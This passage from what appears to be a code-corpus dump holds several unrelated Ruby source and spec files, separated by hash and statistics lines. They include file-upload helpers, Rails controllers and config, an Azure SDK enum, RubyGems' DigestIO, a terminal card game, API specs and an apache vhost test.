instance_variable_set("@mapped_#{attr}", mapper.outputs)
end
instance_variable_get("@mapped_#{attr}")
end
# Define the original filename method.
define_method("#{attr}_original_filename") do
echo_uploads_map_metadata(attr, options, &:original_filename)
end
# Define the path method. This method will raise if the given storage
# class doesn't support the #path method.
define_method("#{attr}_path") do
echo_uploads_map_metadata(attr, options) do |meta|
meta.path
end
end
# Define the MIME type method.
define_method("#{attr}_mime") do
echo_uploads_map_metadata(attr, options, &:mime_type)
end
alias_method "#{attr}_mime_type", "#{attr}_mime"
# Define the key method
define_method("#{attr}_key") do
echo_uploads_map_metadata(attr, options, &:key)
end
# Define the storage method.
define_method("#{attr}_storage") do
echo_uploads_map_metadata(attr, options, &:storage)
end
# Define the url method.
define_method("#{attr}_url") do |options = {}|
echo_uploads_map_metadata(attr, options) do |meta|
if meta.storage.respond_to?(:url)
meta.storage.url meta.key, options
else
raise(
NoMethodError,
"The Echo Uploads file store you've selected, " +
"#{meta.storage.class.to_s}, does not support the #url method."
)
end
end
end
# Define the has_x? method. Returns true if a permanent or temporary file has been
# persisted, or if a file (which may not be valid) has been uploaded this request
# cycle.
define_method("has_#{attr}?") do
# Does this record have a permanent file?
send("has_prm_#{attr}?") or
# Did the submitted form "remember" a previously saved metadata record?
send("has_tmp_#{attr}?") or
# Has a new file been uploaded in this request cycle?
send(attr).present?
end
# Define the has_prm_x? method. Returns true if the permanent metadata record
# exists and has its owner set to this object.
define_method("has_prm_#{attr}?") do
send("#{attr}_metadata").present? and send("#{attr}_metadata").persisted?
end
# Define the has_tmp_x? method. Returns true if the record "remembers"
# a temporary metadata record. (Typically because validation errors caused
# the form to be redisplayed.)
define_method("has_tmp_#{attr}?") do
send("#{attr}_tmp_metadata").present?
end
# Define the read_x method. Delegates to the #read method of the store (e.g.
# FilesystemStore).
define_method("read_#{attr}") do
echo_uploads_map_metadata(attr, options, &:read)
end
define_method("write_#{attr}") do |&block|
echo_uploads_write_prm_file(attr, options, &block)
end
define_method("#{attr}_size") do
echo_uploads_map_metadata(attr, options, &:size)
end
define_method("maybe_write_tmp_#{attr}") do
echo_uploads_maybe_write_tmp_file(attr, options)
end
define_method("destroy_#{attr}") do
echo_uploads_map_metadata(attr, options, &:destroy)
end
# Define the association with the metadata model.
if options[:multiple]
has_many("#{attr}_metadatas".to_sym,
->() { where(owner_attr: attr) },
as: :owner, dependent: :destroy, class_name: '::EchoUploads::File'
)
alias_method attr.to_s.pluralize, "#{attr}_metadatas"
define_method("#{attr}_metadata") do
send("#{attr}_metadatas").first
end
define_method("#{attr}_metadata=") do |val|
send("#{attr}_metadatas") << val
end
else
has_one("#{attr}_metadata".to_sym,
->() { where(owner_attr: attr) },
as: :owner, dependent: :destroy, class_name: '::EchoUploads::File'
)
end
# Define the temp attribute for the metadata model.
attr_accessor "#{attr}_tmp_metadata"
echo_uploads_configure_tmp_file_writing attr, options
echo_uploads_configure_prm_file_writing attr, options
end
end
end
end
| 40.491039 | 96 | 0.598477 |
e99a7f93a79fa8680c29d85044f11b911eb86abc
| 120 |
class WorkoutExerciseSerializer < ActiveModel::Serializer
attributes :sets, :reps, :exercise
has_one :exercise
end
| 20 | 57 | 0.791667 |
1118a17c8f017411f61df1f2116708e63ce4ff7a
| 746 |
class FriendBlocksController < ApplicationController
def create
friendship = current_user.friendships.where(friend_id: params[:id]).first
friendship.banned = true
friendship.save
flash[:success] = "#{friendship.friend.name} has been blocked!"
redirect_to friendships_path
end
def destroy
friendship = current_user.friendships.where(friend_id: params[:id]).first
friendship.banned = false
friendship.save
flash[:success] = "#{friendship.friend.name} has been unblocked!"
redirect_to friend_blocks_path
end
def index
banned_friends_id = current_user.friendships.where(banned: true).select(:friend_id)
@friends = current_user.friends.where("friend_id in (?)", banned_friends_id)
end
end
| 32.434783 | 87 | 0.743968 |
e86d185cd161e9a8f4898a44976f26afc8093e6a
| 91 |
# desc "Explaining what the task does"
# task :nested_models do
# # Task goes here
# end
| 18.2 | 38 | 0.692308 |
ffc37bed6bbfdcf60a8624837b47da9bc2aee0c1
| 457 |
# encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2020_06_01
module Models
#
# Defines values for HubBgpConnectionStatus
#
module HubBgpConnectionStatus
Unknown = "Unknown"
Connecting = "Connecting"
Connected = "Connected"
NotConnected = "NotConnected"
end
end
end
| 24.052632 | 70 | 0.702407 |
e25d7fd18e1526918366d4eabd057159e5ce5fab
| 152 |
class AddNumReviewsToAssignments < ActiveRecord::Migration
def change
change_column :assignments, :num_reviews, :integer, :default => 3
end
end
| 25.333333 | 69 | 0.769737 |
4a482e7231524f9ffcebd0630bb705e805c6faf2
| 7,357 |
=begin
#Selling Partner API for A+ Content Management
#With the A+ Content API, you can build applications that help selling partners add rich marketing content to their Amazon product detail pages. A+ content helps selling partners share their brand and product story, which helps buyers make informed purchasing decisions. Selling partners assemble content by choosing from content modules and adding images and text.
OpenAPI spec version: 2020-11-01
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.26
=end
require 'date'
module AmzSpApi::AplusContentApiModel
# Plain positional text, used in collections of brief labels and descriptors.
class PlainTextItem
# The rank or index of this text item within the collection. Different items cannot occupy the same position within a single collection.
attr_accessor :position
# The actual plain text.
attr_accessor :value
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'position' => :'position',
:'value' => :'value'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'position' => :'Object',
:'value' => :'Object'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `AmzSpApi::AplusContentApiModel::PlainTextItem` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `AmzSpApi::AplusContentApiModel::PlainTextItem`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'position')
self.position = attributes[:'position']
end
if attributes.key?(:'value')
self.value = attributes[:'value']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @position.nil?
invalid_properties.push('invalid value for "position", position cannot be nil.')
end
if @value.nil?
invalid_properties.push('invalid value for "value", value cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @position.nil?
return false if @value.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
position == o.position &&
value == o.value
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[position, value].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
elsif attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
AmzSpApi::AplusContentApiModel.const_get(type).build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end end
end
| 32.126638 | 365 | 0.636673 |
f8bde0f557f439c5999e8a03ce9bf413363c200d
| 1,333 |
##
# IO wrapper that creates digests of contents written to the IO it wraps.
class Gem::Package::DigestIO
##
# Collected digests for wrapped writes.
#
# {
# 'SHA1' => #<OpenSSL::Digest: [...]>,
# 'SHA512' => #<OpenSSL::Digest: [...]>,
# }
attr_reader :digests
##
# Wraps +io+ and updates digest for each of the digest algorithms in
# the +digests+ Hash. Returns the digests hash. Example:
#
# io = StringIO.new
# digests = {
# 'SHA1' => OpenSSL::Digest.new('SHA1'),
# 'SHA512' => OpenSSL::Digest.new('SHA512'),
# }
#
# Gem::Package::DigestIO.wrap io, digests do |digest_io|
# digest_io.write "hello"
# end
#
# digests['SHA1'].hexdigest #=> "aaf4c61d[...]"
# digests['SHA512'].hexdigest #=> "9b71d224[...]"
def self.wrap io, digests
digest_io = new io, digests
yield digest_io
return digests
end
##
# Creates a new DigestIO instance. Using ::wrap is recommended, see the
# ::wrap documentation for documentation of +io+ and +digests+.
def initialize io, digests
@io = io
@digests = digests
end
##
# Writes +data+ to the underlying IO and updates the digests
def write data
result = @io.write data
@digests.each do |_, digest|
digest << data
end
result
end
end
| 20.507692 | 74 | 0.594899 |
1cdeaf3620b71a025a1d123a84b23a8828bbb4f8
| 3,637 |
Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
config.phoenix_url = nil # Will default to current host:port
config.phoenix_path = '/proxy'
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Enable Rack::Cache to put a simple HTTP cache in front of your application
# Add `rack-cache` to your Gemfile before enabling this.
# For large-scale production use, consider using a caching reverse proxy like nginx, varnish or squid.
# config.action_dispatch.rack_cache = true
# Disable Rails's static asset server (Apache or nginx will already do this).
config.serve_static_assets = false
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# Generate digests for assets URLs.
config.assets.digest = true
# `config.assets.precompile` has moved to config/initializers/assets.rb
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = "X-Sendfile" # for apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for nginx
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Set to :debug to see everything in the log.
config.log_level = :info
# Prepend all log lines with the following tags.
# config.log_tags = [ :subdomain, :uuid ]
# Use a different logger for distributed setups.
# config.logger = ActiveSupport::TaggedLogging.new(SyslogLogger.new)
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = "http://assets.example.com"
# Precompile additional assets.
# application.js, application.css, and all non-JS/CSS in app/assets folder are already added.
# config.assets.precompile += %w( search.js )
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Disable automatic flushing of the log to improve performance.
# config.autoflush_log = false
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
config.action_mailer.asset_host = "http://104.131.33.74/"
config.action_mailer.default_url_options = { host: '104.131.33.74' }
config.action_mailer.default_options = {from: '[email protected]'}
end
| 40.411111 | 104 | 0.759417 |
62db8ae89627388c6b4238f6a76feb6e079072d8
| 5,051 |
require "tty-prompt"
require 'pry'
class PlayerHand
attr_accessor :cards, :deck, :round_won, :player
def initialize(deck, player)
@deck = deck
@cards = []
@player = player
10.times do
@cards.append(deck.remove_card)
end
# deck.players << self
@round_won = false
end
def make_move
puts "\nIt is #{@player.full_name}'s turn.\n\n".light_blue
card = deck.remove_card
while card do
spots = empty_spots
print_spots(spots)
card %= 13
if card == 0
if !(@player.is_cpu)
prompt = TTY::Prompt.new
location = prompt.select("You pulled a " + "W".light_red + "I".light_yellow + "L".light_green + "D ".light_blue + "card! Choose an empty spot to fill with your " + "W".light_red + "I".light_yellow + "L".light_green + "D ".light_blue + "card:", spots)
print "\n"
card = swap_cards(location)
if complete_hand?(@cards)
win
return true
end
else
i = spots.sample
card = @cards[i - 1]
@cards[i - 1] = nil
puts "#{@player.full_name} pulled a " + "W".light_red + "I".light_yellow + "L".light_green + "D ".light_blue + "card! #{@player.full_name} fills a #{i} with their " + "W".light_red + "I".light_yellow + "L".light_green + "D ".light_blue + "card.\n\n"
sleep(2.1)
if complete_hand?(@cards)
win
return true
end
end
elsif card == 11 || card == 12
garbage_card_prompt(card)
return true
else
replace_card_prompt(card)
temp = card
card = swap_cards(card)
if card == nil
already_played_prompt(temp)
end
if complete_hand?(@cards)
win
return true
end
end
end
end
private
def swap_cards(new)
temp = @cards[new - 1]
@cards[new - 1] = nil
new = temp
return new
end
def replace_card_prompt(card)
if @player.is_cpu
puts "---> #{@player.full_name} pulled a " + "#{card}".light_red + "! #{@player.full_name} plays their " + "#{card}".light_red + ".\n\n"
sleep(2.1)
else
continue = TTY::Prompt.new
continue.keypress("---> You pulled a " + "#{card}".light_red + "! Press enter to play your card.\n", keys: [:return])
end
end
def garbage_card_prompt(card)
if card == 11
card = "jack"
else
card = "queen"
end
if @player.is_cpu
puts "---> #{@player.full_name} pulled a " + "#{card}".light_red + ", which is a garbage card. Their turn ends.\n\n"
sleep(2.1)
else
continue = TTY::Prompt.new
continue.keypress("---> You pulled a " + "#{card}".light_red + ", which is a garbage card. Press enter to end your turn.\n", keys: [:return])
end
end
def already_played_prompt(card)
if @player.is_cpu
puts "#{@player.full_name} has already played this " + "#{card}".light_red + ". Their turn ends.\n\n"
sleep(2.1)
else
continue = TTY::Prompt.new
continue.keypress("You have already played a " + "#{card}".light_red + ". Press enter to end your turn.\n", keys: [:return])
end
end
def empty_spots
i = 0
empty_spots = []
while i < 10 do
if @cards[i] != nil
empty_spots << i + 1
end
i += 1
end
empty_spots
end
def print_spots(empty)
if @player.is_cpu
print "#{@player.full_name} draws a card. Here are #{@player.full_name}'s empty spots: "
else
print "You draw a card. These are your empty spots: "
end
len = empty.length
if len > 2
i = 1
while i < len
print "#{empty[i - 1]}".green + ", "
i += 1
end
print "and " + "#{empty[len - 1]}\n\n".green
elsif len == 2
print "#{empty[0]} ".green + "and " + "#{empty[1]}\n\n".green
else
print "#{empty[0]}\n\n".green
end
end
def complete_hand?(array)
array.uniq.size <= 1
end
def win
@round_won = true
if @player.is_cpu
puts "#{@player.full_name} won the round!\n".light_blue
else
puts "You won the round!\n".light_blue
end
end
end
| 27.155914 | 270 | 0.463077 |
e8f53ad1d88508b3feff2867efa9cd077c39608f
| 42 |
module Slackbotsy
VERSION = "0.0.8"
end
| 10.5 | 19 | 0.690476 |
911c3958c98cf87598f4241f65ab85138bd1c089
| 4,785 |
#-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2020 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
require 'rack/test'
describe 'API v3 Attachments by budget resource', type: :request do
include Rack::Test::Methods
include API::V3::Utilities::PathHelper
include FileHelpers
let(:current_user) do
FactoryBot.create(:user,
member_in_project: project,
member_with_permissions: permissions)
end
let(:project) { FactoryBot.create(:project) }
let(:permissions) { [:view_budgets] }
let(:budget) { FactoryBot.create(:budget, project: project) }
subject(:response) { last_response }
before do
allow(User).to receive(:current).and_return current_user
end
describe '#get' do
let(:get_path) { api_v3_paths.attachments_by_budget budget.id }
before do
FactoryBot.create_list(:attachment, 2, container: budget)
get get_path
end
it 'should respond with 200' do
expect(subject.status).to eq(200)
end
it_behaves_like 'API V3 collection response', 2, 2, 'Attachment'
end
describe '#post' do
let(:permissions) { %i[view_budgets edit_budgets] }
let(:request_path) { api_v3_paths.attachments_by_budget budget.id }
let(:request_parts) { { metadata: metadata, file: file } }
let(:metadata) { { fileName: 'cat.png' }.to_json }
let(:file) { mock_uploaded_file(name: 'original-filename.txt') }
let(:max_file_size) { 1 } # given in kiB
before do
allow(Setting).to receive(:attachment_max_size).and_return max_file_size.to_s
post request_path, request_parts
end
it 'should respond with HTTP Created' do
expect(subject.status).to eq(201)
end
it 'should return the new attachment' do
expect(subject.body).to be_json_eql('Attachment'.to_json).at_path('_type')
end
it 'ignores the original file name' do
expect(subject.body).to be_json_eql('cat.png'.to_json).at_path('fileName')
end
context 'metadata section is missing' do
let(:request_parts) { { file: file } }
it_behaves_like 'invalid request body', I18n.t('api_v3.errors.multipart_body_error')
end
context 'file section is missing' do
# rack-test won't send a multipart request without a file being present
# however as long as we depend on correctly named sections this test should do just fine
let(:request_parts) { { metadata: metadata, wrongFileSection: file } }
it_behaves_like 'invalid request body', I18n.t('api_v3.errors.multipart_body_error')
end
context 'metadata section is no valid JSON' do
let(:metadata) { '"fileName": "cat.png"' }
it_behaves_like 'parse error'
end
context 'metadata is missing the fileName' do
let(:metadata) { Hash.new.to_json }
it_behaves_like 'constraint violation' do
let(:message) { "fileName #{I18n.t('activerecord.errors.messages.blank')}" }
end
end
context 'file is too large' do
let(:file) { mock_uploaded_file(content: 'a' * 2.kilobytes) }
let(:expanded_localization) do
I18n.t('activerecord.errors.messages.file_too_large', count: max_file_size.kilobytes)
end
it_behaves_like 'constraint violation' do
let(:message) { "File #{expanded_localization}" }
end
end
context 'only allowed to add messages, but no edit permission' do
let(:permissions) { %i[view_messages add_messages] }
it_behaves_like 'unauthorized access'
end
context 'only allowed to view messages' do
let(:permissions) { [:view_messages] }
it_behaves_like 'unauthorized access'
end
end
end
| 33 | 94 | 0.700313 |
389c9e27915ac866b1216d6b062172dbb24784e2
| 429 |
class ApplicationController < ActionController::Base
def hello
render html: "from local this time"
end
def find_airport(code)
@found = nil
if (!code.nil?) && (code.length() == 3)
@found = Airport.all.find_by(iata: code)
elsif (!code.nil?) && (code.length() == 4)
@found = Airport.all.find_by(icao: code)
end
if [email protected]?
@found
else
nil
end
end
end
| 19.5 | 52 | 0.578089 |
265315a32c9916be31477846a952d58aaae4a7ae
| 2,307 |
# frozen_string_literal: true
# Basic integration example - run code to produce html output
#
# * Requires .env populated with valid Twitter API creds.
#
$LOAD_PATH.unshift File.expand_path("../../lib", __FILE__)
require_relative "./support/jekyll_template"
require "jekyll-twitter-plugin"
require "erb"
require "byebug"
OUTPUT_FILENAME = "output_test.html"
OPTIONS = [
"https://twitter.com/jekyllrb maxwidth=500 limit=5",
"https://twitter.com/rubygems",
"https://twitter.com/i/moments/650667182356082688 maxwidth=500",
"https://twitter.com/TwitterDev/timelines/539487832448843776 limit=5 widget_type=grid maxwidth=500",
"https://twitter.com/rubygems/status/518821243320287232",
"https://twitter.com/rubygems/status/11",
"https://twitter.com/rubygems/status/518821243320287232 align=right width=350",
"https://twitter.com/Ace_Tate/status/225611299009216512",
"https://twitter.com/FeelsGood2BeMe/status/225456333032398848",
"oembed https://twitter.com/rubygems/status/518821243320287232",
].freeze
COLOUR_MAP = {
red: 31,
green: 32,
yellow: 33,
blue: 34
}.freeze
def say_with_colour(text, colour_name)
colour_code = COLOUR_MAP.fetch(colour_name)
puts "\e[#{colour_code}m#{text}\e[0m"
end
class TwitterRenderer
Context = Struct.new(:registers)
Site = Struct.new(:config)
def initialize(options)
@options = options
@jekyll_context = Context.new(site: Site.new({}))
end
def render
ERB.new(template)
.result(binding)
end
private
attr_reader :options, :jekyll_context
def render_twitter_tag(params)
say_with_colour "Fetching with params: #{params}", :yellow
TwitterJekyll::TwitterTag.new(nil, params, nil).render(jekyll_context)
end
def template
<<~HTML
<html>
<body>
<h1>jekyll-twitter-plugin output tests</h1>
<% options.each do |option| %>
<h3><%= option %></h3>
<%= render_twitter_tag(option) %>
<hr>
<% end %>
</body>
</html>
HTML
end
end
def main
rederer = TwitterRenderer.new(OPTIONS)
File.open(OUTPUT_FILENAME, "w") do |f|
f.write rederer.render
end
end
if __FILE__ == $PROGRAM_NAME
say_with_colour "Running integration tests...", :red
main
say_with_colour "Created file: #{OUTPUT_FILENAME}", :green
end
| 25.921348 | 102 | 0.698309 |
e82f9bdf160deacbe7f0384a6105c69692714c86
| 138 |
class AddUserIdToPet < ActiveRecord::Migration[6.0]
def change
add_reference :pets, :user, null: false, foreign_key: true
end
end
| 23 | 62 | 0.73913 |
61a9869a582cb1a537941ba7614731a4432d0c47
| 100,486 |
require 'spec_helper'
describe 'apache::vhost', type: :define do
describe 'os-independent items' do
on_supported_os.each do |os, facts|
# this setup uses fastcgi wich isn't available on RHEL 7 / RHEL 8 / Ubuntu 18.04
next if facts[:os]['release']['major'] == '18.04' || facts[:os]['release']['major'] == '20.04'
next if (facts[:os]['release']['major'] == '7' || facts[:os]['release']['major'] == '8') && facts[:os]['family']['RedHat']
# next if facts[:os]['name'] == 'SLES'
apache_name = case facts[:os]['family']
when 'RedHat'
'httpd'
when 'Debian'
'apache2'
else
'apache2'
end
let :pre_condition do
"class {'apache': default_vhost => false, default_mods => false, vhost_enable_dir => '/etc/#{apache_name}/sites-enabled'}"
end
let :title do
'rspec.example.com'
end
let :default_params do
{
docroot: '/rspec/docroot',
port: '84',
}
end
context "on #{os} " do
let :facts do
facts
end
describe 'basic assumptions' do
let(:params) { default_params }
it { is_expected.to contain_class('apache') }
it { is_expected.to contain_class('apache::params') }
it { is_expected.to contain_apache__listen(params[:port]) }
# namebased virualhost is only created on apache 2.2 and older
if (facts[:os]['family'] == 'RedHat' && facts[:os]['release']['major'].to_i < 8) ||
(facts[:os]['name'] == 'Amazon') ||
(facts[:os]['name'] == 'SLES' && facts[:os]['release']['major'].to_i < 12)
it { is_expected.to contain_apache__namevirtualhost("*:#{params[:port]}") }
end
end
context 'set everything!' do
let :params do
{
'docroot' => '/var/www/foo',
'manage_docroot' => false,
'virtual_docroot' => true,
'port' => '8080',
'ip' => '127.0.0.1',
'ip_based' => true,
'add_listen' => false,
'docroot_owner' => 'user',
'docroot_group' => 'wheel',
'docroot_mode' => '0664',
'serveradmin' => 'foo@localhost',
'ssl' => true,
'ssl_cert' => '/ssl/cert',
'ssl_key' => '/ssl/key',
'ssl_chain' => '/ssl/chain',
'ssl_crl_path' => '/ssl/crl',
'ssl_crl' => 'foo.crl',
'ssl_certs_dir' => '/ssl/certs',
'ssl_protocol' => 'SSLv2',
'ssl_cipher' => 'HIGH',
'ssl_honorcipherorder' => 'Off',
'ssl_verify_client' => 'optional',
'ssl_verify_depth' => '3',
'ssl_options' => '+ExportCertData',
'ssl_openssl_conf_cmd' => 'DHParameters "foo.pem"',
'ssl_proxy_verify' => 'require',
'ssl_proxy_check_peer_cn' => 'on',
'ssl_proxy_check_peer_name' => 'on',
'ssl_proxy_check_peer_expire' => 'on',
'ssl_proxyengine' => true,
'ssl_proxy_cipher_suite' => 'HIGH',
'ssl_proxy_protocol' => 'TLSv1.2',
'priority' => '30',
'default_vhost' => true,
'servername' => 'example.com',
'serveraliases' => ['test-example.com'],
'options' => ['MultiView'],
'override' => ['All'],
'directoryindex' => 'index.html',
'vhost_name' => 'test',
'logroot' => '/var/www/logs',
'logroot_ensure' => 'directory',
'logroot_mode' => '0600',
'logroot_owner' => 'root',
'logroot_group' => 'root',
'log_level' => 'crit',
'access_log' => false,
'access_log_file' => 'httpd_access_log',
'access_log_syslog' => true,
'access_log_format' => '%h %l %u %t \"%r\" %>s %b',
'access_log_env_var' => '',
'aliases' => '/image',
'directories' => [
{
'path' => '/var/www/files',
'provider' => 'files',
'require' => ['valid-user', 'all denied'],
},
{
'path' => '/var/www/files',
'provider' => 'files',
'additional_includes' => ['/custom/path/includes', '/custom/path/another_includes'],
},
{
'path' => '/var/www/files',
'provider' => 'files',
'require' => 'all granted',
},
{
'path' => '/var/www/files',
'provider' => 'files',
'require' =>
{
'enforce' => 'all',
'requires' => ['all-valid1', 'all-valid2'],
},
},
{
'path' => '/var/www/files',
'provider' => 'files',
'require' =>
{
'enforce' => 'none',
'requires' => ['none-valid1', 'none-valid2'],
},
},
{
'path' => '/var/www/files',
'provider' => 'files',
'require' =>
{
'enforce' => 'any',
'requires' => ['any-valid1', 'any-valid2'],
},
},
{
'path' => '*',
'provider' => 'proxy',
},
{ 'path' => '/var/www/files/indexed_directory',
'directoryindex' => 'disabled',
'options' => ['Indexes', 'FollowSymLinks', 'MultiViews'],
'index_options' => ['FancyIndexing'],
'index_style_sheet' => '/styles/style.css' },
{ 'path' => '/var/www/files/output_filtered',
'set_output_filter' => 'output_filter' },
{ 'path' => '/var/www/files/input_filtered',
'set_input_filter' => 'input_filter' },
{ 'path' => '/var/www/files',
'provider' => 'location',
'limit' => [
{ 'methods' => 'GET HEAD',
'require' => ['valid-user'] },
] },
{ 'path' => '/var/www/files',
'provider' => 'location',
'limit_except' => [
{ 'methods' => 'GET HEAD',
'require' => ['valid-user'] },
] },
{ 'path' => '/var/www/dav',
'dav' => 'filesystem',
'dav_depth_infinity' => true,
'dav_min_timeout' => '600' },
{
'path' => '/var/www/http2',
'h2_copy_files' => true,
'h2_push_resource' => [
'/foo.css',
'/foo.js',
],
},
{
'path' => '/',
'provider' => 'location',
'auth_ldap_referrals' => 'off',
},
{
'path' => '/proxy',
'provider' => 'location',
'proxy_pass' => [
{
'url' => 'http://backend-b/',
'keywords' => ['noquery', 'interpolate'],
'params' => {
'retry' => '0',
'timeout' => '5',
},
},
],
},
{
'path' => '/var/www/node-app/public',
'passenger_enabled' => true,
'passenger_base_uri' => '/app',
'passenger_ruby' => '/path/to/ruby',
'passenger_python' => '/path/to/python',
'passenger_nodejs' => '/path/to/nodejs',
'passenger_meteor_app_settings' => '/path/to/file.json',
'passenger_app_env' => 'demo',
'passenger_app_root' => '/var/www/node-app',
'passenger_app_group_name' => 'foo_bar',
'passenger_app_start_command' => 'start-command',
'passenger_app_type' => 'node',
'passenger_startup_file' => 'start.js',
'passenger_restart_dir' => 'temp',
'passenger_load_shell_envvars' => false,
'passenger_rolling_restarts' => false,
'passenger_resist_deployment_errors' => false,
'passenger_user' => 'nodeuser',
'passenger_group' => 'nodegroup',
'passenger_friendly_error_pages' => true,
'passenger_min_instances' => 7,
'passenger_max_instances' => 9,
'passenger_force_max_concurrent_requests_per_process' => 12,
'passenger_start_timeout' => 10,
'passenger_concurrency_model' => 'thread',
'passenger_thread_count' => 20,
'passenger_max_requests' => 2000,
'passenger_max_request_time' => 1,
'passenger_memory_limit' => 32,
'passenger_high_performance' => false,
'passenger_buffer_upload' => false,
'passenger_buffer_response' => false,
'passenger_error_override' => false,
'passenger_max_request_queue_size' => 120,
'passenger_max_request_queue_time' => 5,
'passenger_sticky_sessions' => true,
'passenger_sticky_sessions_cookie_name' => '_delicious_cookie',
'passenger_sticky_sessions_cookie_attributes' => 'SameSite=Lax; Secure;',
'passenger_allow_encoded_slashes' => false,
'passenger_app_log_file' => '/tmp/app.log',
